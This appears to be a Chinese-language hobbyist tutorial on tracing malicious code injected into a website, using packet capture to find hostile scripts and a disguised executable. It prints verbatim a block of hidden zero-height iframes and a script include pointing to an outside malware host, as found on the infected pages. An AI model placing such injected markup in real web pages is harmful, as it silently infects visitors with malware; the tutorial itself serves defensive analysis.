揪出恶意代码

-----------------------------------------------------------------

大家好，我是   噯我還是咜 QQ83465073

今天给大家做的教程是     《揪出恶意代码》---------思路。。。。

目标网站为：http://11sss.com

首先给大家看一下吧``````

看见效果了吧``？？

呵呵 每打开一页都有提示。。。郁闷啊。。。。

好了  我们就把它（恶意代码）揪出来吧`看看到底是什么东东。。。

首先 抓包                 我打字比较慢  大家快进。。。。

抓包用到的工具有  ：  wsockexpert

OK 刷一下   

郁闷啊 我们在刷一下 ``````浪费大家时间了   我先停一下

不好意思啊 我们继续 。。。

我仔细的找了一下  看见 这样的  一个页面  地址  http://cc.wzxqy.com/wm/index.htm

但是网站正常的 首页 应该是   http://d.11sss.com/index.htm

所以说http://cc.wzxqy.com/wm/1.js这个有点鬼``````

我们直接用讯雷下下来看看

OK  看看

<s cript language=javas cript src=1.js></s cript>  一定是JS挂马的方式咯

我刚刚开始看的时候，没明白这是什么东西，还好有  百度

结果我找到  解密的文件  

我们来解个密吧```

解完的在 a.txt文件里

看看 有个 .exe文件哦。。。。。

我们下了下来。。。到这里我们已经把这个找了出来啊```````

大小才有  22.2 KB (22,774 字节)

会是什么呢？我们不太会分析，所以 教程就到这里吧```

------------------------------------------------------
我们再来看看抓包的情况 

会不会就这么单一呢`？`没这么简单吧```看看

GO！！！！

看看  http://pop.wzxqy.com/444/index.htm  是什么呢`？~

老办法 下来看看 ```

<iframe src="http://cc.wzxqy.com/tt/index.htm" width="20" height="0" frameborder="0"></iframe>
<iframe src="http://cc.wzxqy.com/wm/index.htm" width="20" height="0" frameborder="0"></iframe>
<iframe src="http://xx.wzxqy.com/wm2/index.htm" width="20" height="0" frameborder="0"></iframe>
<iframe src="http://a.wzxqy.com/wm/index.htm" width="20" height="0" frameborder="0"></iframe>

大家对这个应该很熟悉吧 ~？~~``

继续。。。继续下载   看看资料

有点慢  耽误大家时间了

我们把这些 下回来的网页放到一个文件夹好了

好了  我就不一个一个下了``

还有个     http://cc.wzxqy.com/tt/1.gif

继续下了   呵呵

大家才才  那真的是一个图片吗`？~``

我们直接这么看一下

呵呵不显示哦。。

.exe 又一个  可执行文件哦

又是跟上面的那个 是一样的  22.2 KB (22,774 字节)

呵呵  两中不同的方法挂马  郁闷啊````